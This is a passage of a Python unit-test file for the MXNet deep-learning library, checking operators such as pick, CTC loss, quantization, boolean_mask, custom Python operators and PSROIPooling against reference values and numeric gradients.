        check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
        # length input is integer-valued and receives a zero gradient
        check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
                                [np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
                                rtol=1e-2, atol=1e-3, dtype="asnumpy")
@with_seed()
def test_pick():
    """Test mx.nd.pick against a numpy advanced-indexing reference, both modes."""
    def test_pick_helper(index_type=np.int32):
        for _ in range(100):
            for mode in ['clip', 'wrap']:
                ndim = np.random.randint(1, 5)
                bshape = np.random.randint(1, 10, size=ndim)
                axis = np.random.randint(0, ndim)
                # index shape equals data shape with the picked axis set to 1
                sshape = bshape.copy()
                sshape[axis] = 1
                data = np.random.uniform(-1, 1, size=bshape)
                # 'wrap' allows indices outside [0, dim); they wrap modulo dim
                if mode == 'wrap':
                    index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
                else:
                    index = np.random.randint(0, bshape[axis], size=sshape)
                # Build the numpy advanced-indexing tuple mirroring pick: the
                # picked axis uses the (possibly wrapped) indices, every other
                # axis a broadcastable arange.
                exp = []
                for i in range(ndim):
                    if i == axis:
                        if mode == 'wrap':
                            exp.append(index % bshape[axis])
                        else:
                            exp.append(index)
                    else:
                        ishape = [1 for _ in range(ndim)]
                        ishape[i] = bshape[i]
                        exp.append(np.arange(bshape[i]).reshape(ishape))
                expected = data[exp]
                data = mx.nd.array(data, dtype='float32')
                index = mx.nd.array(index, dtype=index_type)
                out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
                assert_almost_equal(out.asnumpy(), expected)

                # numeric gradient wrt data only (indices are not differentiable)
                data_holder = data
                index_holder = index
                data = mx.sym.Variable('data')
                index = mx.sym.Variable('index')
                sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
                check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])

    test_pick_helper(np.int32)
    test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth):
    """Validate mx.sym.ctc_loss: train/inference forward agreement, reference
    loss when supplied, and a numeric gradient check on the activations.

    Fix: the original kept NDArray references into ``exe.outputs``, a buffer
    the executor reuses across forward calls, so the train-vs-inference
    comparison compared the buffer with itself and could never fail. Each
    result is now snapshotted with ``asnumpy()`` before the next forward.
    """
    in_var = mx.sym.Variable('input')
    labels_var = mx.sym.Variable('labels')
    ctc = mx.sym.ctc_loss(in_var, labels_var)
    acts_nd = mx.nd.array(acts, ctx=default_context())
    labels_nd = mx.nd.array(labels, ctx=default_context())
    exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
    # test forward with grad calc; snapshot before the output buffer is reused
    exe.forward(is_train=True)
    loss_train = exe.outputs[0].asnumpy()
    # test forward without grad calc
    exe.forward(is_train=False)
    loss_infer = exe.outputs[0].asnumpy()
    # make sure losses calculated with both modes are the same
    assert_almost_equal(loss_train, loss_infer)
    # test against ground truth, if available
    if loss_truth is not None:
        assert_almost_equal(loss_train, loss_truth)
    # test grad
    check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
# check contrib operator for backward compatibility
def check_contrib_ctc_loss(acts, labels, loss_truth):
    """Same checks as check_ctc_loss, but through mx.sym.contrib.ctc_loss.

    Fix: as in check_ctc_loss, the original compared aliased references into
    the executor's reused output buffer; results are now snapshotted with
    ``asnumpy()`` so train and inference losses are genuinely compared.
    """
    in_var = mx.sym.Variable('input')
    labels_var = mx.sym.Variable('labels')
    ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
    acts_nd = mx.nd.array(acts, ctx=default_context())
    labels_nd = mx.nd.array(labels, ctx=default_context())
    exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
    # test forward with grad calc; snapshot before the output buffer is reused
    exe.forward(is_train=True)
    loss_train = exe.outputs[0].asnumpy()
    # test forward without grad calc
    exe.forward(is_train=False)
    loss_infer = exe.outputs[0].asnumpy()
    # make sure losses calculated with both modes are the same
    assert_almost_equal(loss_train, loss_infer)
    # test against ground truth, if available
    if loss_truth is not None:
        assert_almost_equal(loss_train, loss_truth)
    # test grad
    check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
    """CTC loss checks against reference losses computed with Torch WarpCTC."""
    # Test 1: identical rows in the batch + comparison against Torch WarpCTC
    batch_acts = np.array(
        [[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
         [[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
         [[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
        dtype=np.float32)
    batch_labels = np.array([[2, 3, 0], [2, 3, 0]])
    expected = np.array([4.04789, 4.04789], dtype=np.float32)  # from Torch
    check_ctc_loss(batch_acts, batch_labels, expected)
    check_contrib_ctc_loss(batch_acts, batch_labels, expected)

    # Test 2: distinct activations per batch row
    acts2 = np.array(
        [[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
         [[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
         [[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
    labels_float = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
    expected = np.array([7.3557, 5.4091], dtype=np.float32)  # from Torch
    check_ctc_loss(acts2, labels_float, expected)
    check_contrib_ctc_loss(acts2, labels_float, expected)

    # Test 3: integer-typed labels must give the same result
    labels_int = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
    expected = np.array([7.3557, 5.4091], dtype=np.float32)  # from Torch
    check_ctc_loss(acts2, labels_int, expected)
    check_contrib_ctc_loss(acts2, labels_int, expected)
@with_seed()
def test_ctc_loss_with_large_classes():
    """CTC loss must work with a large alphabet (6000 classes)."""
    ctx = default_context()
    num_classes = 6000
    seq_len = 8
    batch_size = 2
    # One column per (time, batch) slot: the class arange rolled by the slot
    # index and scaled down. Joining the columns and reshaping reproduces the
    # (seq_len, batch_size, num_classes) activation tensor.
    columns = [np.roll(np.arange(num_classes, dtype=np.float32), shift).reshape(num_classes, 1) / 13
               for shift in range(seq_len * batch_size)]
    data = np.concatenate(columns, axis=1).reshape(seq_len, batch_size, num_classes)
    label = np.array([
        [100, 200, 300, 400, 500, 0, 0, 0],
        [1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
    nd_data = mx.nd.array(data)
    nd_label = mx.nd.array(label)
    loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
    # Reference values computed once for this fixed input.
    expected_loss = np.array([688.02826, 145.34462])
    assert_almost_equal(loss.asnumpy(), expected_loss)
@with_seed()
def test_ctc_loss_grad():
    """Check CTCLoss forward values and input gradients against TensorFlow data.

    The same reference case is run through the main operator
    (``mx.ndarray.CTCLoss``) and through the contrib alias
    (``mx.contrib.ndarray.CTCLoss``, kept for backward compatibility),
    for both ``blank_label`` conventions. The previous version duplicated
    the entire ~70-line body for the contrib path; the shared checker below
    is parameterized on the operator instead.
    """
    def check_ctc_loss_grad(blank_label, ctc_loss_op):  # reference data from tf
        vocab_size = 5
        max_label_len = 5
        # 'first' uses class 0 as blank (labels shift up by one, padding 0);
        # 'last' pads with -1.
        padding_mask = -1 + (blank_label == 'first')

        # Reference sequence 0: per-step probabilities, loss and gradients.
        targets_0 = [0, 1, 2, 1, 0]
        loss_log_prob_0 = -3.34211
        input_prob_matrix_0 = np.asarray(
            [[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
             [0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
             [0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
             [0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
             [0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
            dtype=np.float32)
        gradient_log_prob_0 = np.asarray(
            [[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
             [0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
             [0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
             [0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
             [-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
            dtype=np.float32)

        # Reference sequence 1 (shorter label sequence).
        targets_1 = [0, 1, 1, 0]
        loss_log_prob_1 = -5.42262
        input_prob_matrix_1 = np.asarray(
            [[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
             [0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
             [0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
             [0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
             [0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
            dtype=np.float32)
        gradient_log_prob_1 = np.asarray(
            [[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
             [0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
             [0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
             [0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
             [-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
            dtype=np.float32)

        # Stack the two sequences batch-wise; pad the time axis with two NaN
        # steps that must be ignored because use_data_lengths=True below.
        inputs = [
            np.vstack(
                [input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
            for t in range(5)
        ] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
        inputs = np.log(np.asarray(inputs, dtype=np.float32))
        # Padded time steps must contribute zero gradient.
        grad_truth = np.array([
            np.vstack(
                [gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
            for t in range(5)
        ] + 2 * [np.zeros((2, vocab_size+1), np.float32)])

        if blank_label == 'first':
            # Reference data places blank last; rotate to put it first.
            inputs = np.roll(inputs, 1, axis=2)
            grad_truth = np.roll(grad_truth, 1, axis=2)

        labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
                             for x in [targets_0, targets_1]])+(blank_label == 'first'))
        seq_lens = np.array([5, 5], dtype=np.int32)
        label_lens = np.array([5, 4], dtype=np.int32)
        loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)

        with default_context():
            data = mx.nd.array(inputs)
            label = mx.nd.array(labels)
            data.attach_grad()
            with mx.autograd.record():
                l = ctc_loss_op(data, label,
                                use_data_lengths=True,
                                use_label_lengths=True,
                                data_lengths=mx.nd.array(seq_lens),
                                label_lengths=mx.nd.array(label_lens),
                                blank_label=blank_label)
                l.backward()
            assert_almost_equal(l.asnumpy(), loss_truth, atol=1e-5, rtol=1e-5)
            assert_almost_equal(data.grad.asnumpy(), grad_truth, atol=1e-5, rtol=1e-5)

    # Main operator first, then the contrib alias for backward compatibility.
    for ctc_op in (mx.ndarray.CTCLoss, mx.contrib.ndarray.CTCLoss):
        check_ctc_loss_grad('first', ctc_op)
        check_ctc_loss_grad('last', ctc_op)
@with_seed()
def test_quantization_op():
    """Round-trip int8 quantize/dequantize against hand-computed values."""
    range_min = mx.nd.array([0.0])
    range_max = mx.nd.array([1.0])
    original = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
    quantized, out_min, out_max = mx.nd.contrib.quantize(original, range_min, range_max, out_type='int8')
    recovered = mx.nd.contrib.dequantize(quantized, out_min, out_max, out_type='float32')
    # Expected int8 codes and the float values they dequantize back to.
    expected_codes = mx.nd.array([[18, 75], [77, 109]])
    expected_recovered = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
    assert same(quantized.asnumpy(), expected_codes.asnumpy())
    assert same(recovered.asnumpy(), expected_recovered.asnumpy())
@with_seed()
def test_index_copy():
    """contrib.index_copy forward plus gradients w.r.t. source (and destination)."""
    dest = mx.nd.zeros((5,3))
    src = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
    idx = mx.nd.array([0,4,2], dtype=np.int64)
    expected_out = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
    expected_dest_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
    expected_src_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])

    # First pass: gradient only w.r.t. the copied rows.
    src.attach_grad()
    with mx.autograd.record():
        result = mx.nd.contrib.index_copy(dest, idx, src)
    result.backward()
    assert same(result.asnumpy(), expected_out.asnumpy())
    assert same(src.grad.asnumpy(), expected_src_grad.asnumpy())

    # Second pass: gradients w.r.t. both destination and copied rows.
    dest.attach_grad()
    src.attach_grad()
    with mx.autograd.record():
        result = mx.nd.contrib.index_copy(dest, idx, src)
    result.backward()
    assert same(result.asnumpy(), expected_out.asnumpy())
    assert same(dest.grad.asnumpy(), expected_dest_grad.asnumpy())
    assert same(src.grad.asnumpy(), expected_src_grad.asnumpy())
@with_seed()
def test_boolean_mask():
    """Forward and gradient checks for contrib.boolean_mask."""
    # Small hand-checked case: only the middle row survives the mask.
    data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
    index = mx.nd.array([0, 1, 0])
    data.attach_grad()
    with mx.autograd.record():
        out = mx.nd.contrib.boolean_mask(data, index)
    out.backward()
    data.grad.wait_to_read()
    expected = np.array([[4, 5, 6]])
    # Gradient of sum-like upstream: 1 for kept rows, 0 for masked-out rows.
    expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
    assert same(out.asnumpy(), expected)
    assert same(data.grad.asnumpy(), expected_grad)
    # test gradient accumulation over repeated backward passes
    shape = (100, 30)
    a = mx.nd.random.randint(0, 100, shape=shape)
    a.attach_grad()
    # Two random boolean row masks (roughly complementary).
    bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
    ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
    mx_grad = mx.nd.zeros_like(a)
    # grad_reqs='add' makes gradients accumulate across the T iterations below.
    mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
    T = 3
    for _ in range(T):
        with mx.autograd.record():
            b = mx.nd.contrib.boolean_mask(a, bi)
            c = mx.nd.contrib.boolean_mask(a, ci)
            su = b.sum() + c.sum()
            su.backward()
    # Expected gradient: rows selected by either mask, broadcast over columns.
    grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
    grad = np.tile(grad, (1,) + shape[1:])
    # T times
    grad *= T
    assert_allclose(a.grad.asnumpy(), grad)
    # Forward outputs must match plain NumPy boolean indexing.
    a_np = a.asnumpy()
    assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
    assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
@with_seed()
def test_div_sqrt_dim():
    """contrib.div_sqrt_dim divides the input by sqrt of its last dimension."""
    in_arr = np.random.normal(0, 1, (5, 10, 8))
    sym_in = mx.symbol.Variable('data')
    sym_out = mx.sym.contrib.div_sqrt_dim(sym_in)
    expected = in_arr / np.sqrt(in_arr.shape[-1])
    check_numeric_gradient(sym_out, [in_arr], numeric_eps=1E-2)
    check_symbolic_forward(sym_out, [in_arr], [expected])
@with_seed()
def test_reciprocal_op():
    """Forward and numeric-gradient checks for mx.sym.reciprocal."""
    eps = 2 ** (-11)
    samples = np.random.rand(3, 4) * 10 - 5
    # Inputs too close to zero break the op and the finite-difference check
    # (factor 6 set empirically; exposed by seed 879579887), so replace
    # problematic inputs with 1.0.
    samples[abs(samples) < 6 * eps] = 1.0
    var = mx.symbol.Variable('data')
    sym = mx.sym.reciprocal(var)
    check_numeric_gradient(sym, [samples], numeric_eps=eps)
    check_symbolic_forward(sym, [samples], [np.reciprocal(samples)])
@with_seed()
def test_cbrt_op():
    """Forward and numeric-gradient checks for mx.sym.cbrt."""
    eps = 2 ** (-11)
    samples = np.random.rand(3, 4) * 10 - 5
    # The gradient of cbrt is infinite at the origin, which breaks the
    # finite-difference check (factor 4 set empirically; exposed by seed
    # 553872106). Replace problematic inputs with 1.0.
    samples[abs(samples) < 4 * eps] = 1.0
    var = mx.symbol.Variable('data')
    sym = mx.sym.cbrt(var)
    check_numeric_gradient(sym, [samples], numeric_eps=eps)
    check_symbolic_forward(sym, [samples], [np.cbrt(samples)])
@with_seed()
def test_rcbrt_op():
    """Forward and numeric-gradient checks for mx.sym.rcbrt (1 / cbrt)."""
    eps = 2 ** (-11)
    samples = np.random.rand(3, 4) * 10 - 5
    # Inputs near zero cause division-by-zero and finite-difference trouble
    # (factor 4 set empirically; exposed by seed 788174893). Replace
    # problematic inputs with 1.0.
    samples[abs(samples) < 4 * eps] = 1.0
    var = mx.symbol.Variable('data')
    sym = mx.sym.rcbrt(var)
    check_numeric_gradient(sym, [samples], numeric_eps=eps)
    check_symbolic_forward(sym, [samples], [1 / np.cbrt(samples)])
@with_seed()
def test_custom_op():
    """End-to-end checks for Python custom operators (dense and sparse paths)."""
    # Squaring operator supporting both 'default' and 'csr' storage; the
    # aux state is used to verify aux arrays reach forward/backward intact.
    class Sqr(mx.operator.CustomOp):
        def forward(self, is_train, req, in_data, out_data, aux):
            if in_data[0].stype == 'default':
                aux[0][:] = 1
                self.assign(out_data[0], req[0], in_data[0]*in_data[0])
            else:
                # CSR path: square only the stored values, keep the sparsity pattern.
                inp = in_data[0]
                csr_m = inp.data * inp.data
                out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
                self.assign(out_data[0], req[0], out)
                if (in_data[0].stype == 'csr'):
                    assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
        def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
            # d(x^2)/dx = 2x, chained with the incoming gradient.
            self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
            if in_data[0].stype == 'default':
                assert (aux[0].asnumpy() == 1).all()
    @mx.operator.register("sqr")
    class SqrProp(mx.operator.CustomOpProp):
        def __init__(self):
            super(SqrProp, self).__init__(need_top_grad=True)
        def list_arguments(self):
            return ['data']
        def list_outputs(self):
            return ['output']
        def list_auxiliary_states(self):
            return ['aux']
        def infer_shape(self, in_shape):
            return in_shape, [in_shape[0]], [in_shape[0]]
        def infer_type(self, in_type):
            return in_type, [in_type[0]], [in_type[0]]
        def infer_storage_type(self, in_stype):
            if in_stype[0] == 'default':
                return ['default'], ['default'], ['default']
            return ['csr'], ['csr'], ['csr']
        def infer_storage_type_backward(self, ograd_stype, in_stype,
                                        out_stype, igrad_stype, aux_stype):
            if in_stype[0] == 'default':
                return ['default'], ['default'], ['default'], ['default'], ['default']
            return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
        def create_operator(self, ctx, shapes, dtypes):
            return Sqr()
    # Dense path: numeric-gradient checks, also with dtype casts around the op.
    data = mx.symbol.Variable('data')
    aux = mx.symbol.Variable('aux')
    op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
    x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
    aux = mx.nd.zeros_like(x)
    check_numeric_gradient(op, [x], [aux])
    data = mx.symbol.cast(data, dtype='float64')
    op = mx.symbol.cast(op, dtype='float32')
    check_numeric_gradient(op, [x], [aux])
    # Sparse (CSR) path: symbolic gradient check, then imperative forward/backward.
    data = mx.symbol.Variable('data', stype='csr')
    aux = mx.symbol.Variable('aux')
    op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
    x = x.tostype('csr')
    aux = mx.nd.zeros_like(x)
    check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
    x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
    x2 = x2.tostype('csr')
    aux2 = mx.nd.zeros_like(x2)
    x2.attach_grad()
    with mx.autograd.record():
        output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
    output.backward()
    expected_output = mx.nd.sparse.square(x2)
    expected_grad = 2 * x2
    rtol = 1e-4
    atol = 1e-6
    assert_almost_equal(output.asnumpy(), expected_output.asnumpy(), rtol=rtol, atol=atol)
    assert_almost_equal(x2.grad.asnumpy(), expected_grad.asnumpy(), rtol=rtol, atol=atol)
    # test for backward compatibility, i.e. the correctness of default implementation of
    # infer storage in custom operator
    class Mult(mx.operator.CustomOp):
        def forward(self, is_train, req, in_data, out_data, aux):
            self.assign(out_data[0], req[0], in_data[0]*in_data[1])
        def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
            # Intentionally ignores out_grad: the gradient of each input is
            # defined as the other input so the asserts below can check it.
            self.assign(in_grad[0], req[0], in_data[1])
            self.assign(in_grad[1], req[1], in_data[0])
    @mx.operator.register("mult")
    class MultProp(mx.operator.CustomOpProp):
        def __init__(self):
            super(MultProp, self).__init__(need_top_grad=True)
        def list_arguments(self):
            return ['lhs', 'rhs']
        def list_outputs(self):
            return ['output']
        def infer_shape(self, in_shape):
            return in_shape, [in_shape[0]], []
        def create_operator(self, ctx, shapes, dtypes):
            return Mult()
    lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
    rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
    lhs.attach_grad()
    rhs.attach_grad()
    with mx.autograd.record():
        y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
    y.backward()
    assert_almost_equal(rhs.asnumpy(), lhs.grad.asnumpy(), rtol=rtol, atol=atol)
    assert_almost_equal(lhs.asnumpy(), rhs.grad.asnumpy(), rtol=rtol, atol=atol)
    # Same operator but with need_top_grad=False and a pass-through
    # infer_storage_type_backward override.
    class MultNoGrad(mx.operator.CustomOp):
        def forward(self, is_train, req, in_data, out_data, aux):
            self.assign(out_data[0], req[0], in_data[0]*in_data[1])
        def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
            self.assign(in_grad[0], req[0], in_data[1])
            self.assign(in_grad[1], req[1], in_data[0])
    @mx.operator.register("mult_no_grad")
    class MultNoGradProp(mx.operator.CustomOpProp):
        def __init__(self):
            super(MultNoGradProp, self).__init__(need_top_grad=False)
        def list_arguments(self):
            return ['lhs', 'rhs']
        def list_outputs(self):
            return ['output']
        def infer_shape(self, in_shape):
            return in_shape, [in_shape[0]], []
        def create_operator(self, ctx, shapes, dtypes):
            return MultNoGrad()
        def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
            return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
    with mx.autograd.record():
        y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
    y2.backward()
    assert_almost_equal(rhs.asnumpy(), lhs.grad.asnumpy(), rtol=rtol, atol=atol)
    assert_almost_equal(lhs.asnumpy(), rhs.grad.asnumpy(), rtol=rtol, atol=atol)
    # Operator with no inputs at all: output shape/type come from op params.
    class NoInputOp(mx.operator.CustomOp):
        def __init__(self, length, depth):
            super(NoInputOp, self).__init__()
            self.output = np.ones(shape=(length, depth), dtype=np.float32)
        def forward(self, is_train, req, in_data, out_data, aux):
            self.assign(out_data[0], req[0], self.output)
        def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
            pass
    @mx.operator.register("no_input_op")
    class NoInputOpProp(mx.operator.CustomOpProp):
        def __init__(self, length, depth):
            super(NoInputOpProp, self).__init__()
            self.length = int(length)
            self.depth = int(depth)
        def list_arguments(self):
            return []
        def list_outputs(self):
            return ['output']
        def infer_shape(self, in_shape):
            return [], [(self.length, self.depth)], []
        def infer_type(self, in_type):
            return [], [np.float32], []
        def create_operator(self, ctx, shapes, dtypes):
            return NoInputOp(length=self.length, depth=self.depth)
    with mx.autograd.record():
        x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
    assert_almost_equal(x.asnumpy(), np.ones(shape=(10, 10), dtype=np.float32))
@with_seed()
def test_custom_op_fork():
    """Custom operators must still work in a forked child process.

    Regression test for
    https://github.com/apache/incubator-mxnet/issues/14396.
    """
    # Simple elementwise-addition custom operator.
    class AdditionOP(mx.operator.CustomOp):
        def __init__(self):
            super(AdditionOP, self).__init__()
        def forward(self, is_train, req, in_data, out_data, aux):
            out_data[0][:] = in_data[0] + in_data[1]
        def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
            # Addition passes the upstream gradient through to both inputs.
            in_grad[0][:] = out_grad[0]
            in_grad[1][:] = out_grad[0]
    @mx.operator.register("AdditionOP")
    class AdditionOPProp(mx.operator.CustomOpProp):
        def __init__(self):
            super(AdditionOPProp, self).__init__()
        def list_arguments(self):
            return ['a', 'b']
        def list_outputs(self):
            return ['output']
        def infer_shape(self, in_shape):
            return in_shape, [in_shape[0]]
        def create_operator(self, ctx, shapes, dtypes):
            return AdditionOP()
    if not sys.platform.startswith('win'):  # no fork in windows
        def custom_add():
            a = mx.nd.array([1, 2, 3])
            b = mx.nd.array([4, 5, 6])
            c = mx.nd.Custom(a, b, op_type='AdditionOP')
            assert_almost_equal((a + b).asnumpy(), c.asnumpy())
        # Run once in the parent, then again in a forked child, which must
        # finish cleanly within the 5-second timeout.
        custom_add()
        from multiprocessing import Process
        p = Process(target=custom_add)
        p.daemon = True
        p.start()
        p.join(5)
        assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
    """Register a custom dot-shaped operator under ``name``.

    The forward pass delegates to ``fun_forward(in_data, out_data)``; the
    backward pass is a no-op. The inferred output shape is
    (rows of a, cols of b). Used by test_custom_op_exc to inject failures
    at different stages of operator execution.
    """
    class Dot(mx.operator.CustomOp):
        def __init__(self):
            super(Dot, self).__init__()
        def forward(self, is_train, req, in_data, out_data, aux):
            fun_forward(in_data, out_data)
        def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
            pass
    @mx.operator.register(name)
    class DotProp(mx.operator.CustomOpProp):
        def __init__(self):
            super(DotProp, self).__init__()
        def list_arguments(self):
            return ['a', 'b']
        def list_outputs(self):
            return ['output']
        def infer_shape(self, in_shape):
            return in_shape, [(in_shape[0][0], in_shape[1][1])]
        def create_operator(self, ctx, shapes, dtypes):
            return Dot()
@with_seed()
def test_custom_op_exc():
    """Errors inside custom operators must surface to the caller as MXNetError.

    See https://github.com/apache/incubator-mxnet/pull/14693.
    """
    # 1. error in python code
    def custom_exc1():
        def f(in_data, out_data):
            assert False
            out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
        _build_dot_custom(f, 'Dot1')
        a = mx.nd.zeros((4, 1))
        b = mx.nd.zeros((1, 4))
        c = mx.nd.Custom(a, b, op_type='Dot1')
        c.wait_to_read()
    assert_raises(MXNetError, custom_exc1)
    # 2. error in pushing operator to engine
    def custom_exc2():
        def f(in_data, out_data):
            out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
        _build_dot_custom(f, 'Dot2')
        a = mx.nd.zeros((4, 2))
        b = mx.nd.zeros((1, 4))
        # trigger error by invalid input shapes of operands
        c = mx.nd.Custom(a, b, op_type='Dot2')
        c.wait_to_read()
    assert_raises(MXNetError, custom_exc2)
    # 3. error in real execution (CPU-only scenarios)
    if default_context().device_type == 'cpu':
        def custom_exc3():
            def f(in_data, out_data):
                dot = mx.nd.dot(in_data[0], in_data[1])
                # input to Cholesky factorization should be
                # symmetric positive-definite, error will be
                # triggered in op execution on cpu
                out_data[0][:] = mx.nd.linalg.potrf(dot)
                out_data[0].wait_to_read()
            _build_dot_custom(f, 'Dot3')
            a = mx.nd.zeros((2, 1))
            b = mx.nd.zeros((1, 2))
            c = mx.nd.Custom(a, b, op_type='Dot3')
            c.wait_to_read()
        assert_raises(MXNetError, custom_exc3)
        # 4. same failure, but without the inner wait: the error must still
        # propagate through the outer wait_to_read.
        def custom_exc4():
            def f(in_data, out_data):
                dot = mx.nd.dot(in_data[0], in_data[1])
                # input to Cholesky factorization should be
                # symmetric positive-definite, error will be
                # triggered in op execution on cpu
                out_data[0][:] = mx.nd.linalg.potrf(dot)
            _build_dot_custom(f, 'Dot4')
            a = mx.nd.zeros((2, 1))
            b = mx.nd.zeros((1, 2))
            c = mx.nd.Custom(a, b, op_type='Dot4')
            c.wait_to_read()
        assert_raises(MXNetError, custom_exc4)
@with_seed()
def test_psroipooling():
    """Numeric-gradient checks for contrib.PSROIPooling over a grid of configs."""
    for num_rois in [1, 2]:
        for num_classes, num_group in itertools.product([2, 3], [2, 3]):
            for image_height, image_width in itertools.product([168, 224], [168, 224]):
                for grad_nodes in [['im_data']]:
                    spatial_scale = 0.0625
                    # builtin int(): np.int is a deprecated alias removed in NumPy 1.24
                    feat_height = int(image_height * spatial_scale)
                    feat_width = int(image_width * spatial_scale)
                    im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
                    rois_data = np.zeros([num_rois, 5])
                    # random, sorted (x0, x1) and (y0, y1) ROI corners inside the image
                    rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
                    rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
                    im_data_var = mx.symbol.Variable(name="im_data")
                    rois_data_var = mx.symbol.Variable(name="rois_data")
                    op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
                                                     group_size=num_group, pooled_size=num_group,
                                                     output_dim=num_classes, name='test_op')
                    rtol, atol = 1e-2, 1e-3
                    check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
                                           grad_nodes=grad_nodes)
@with_seed()
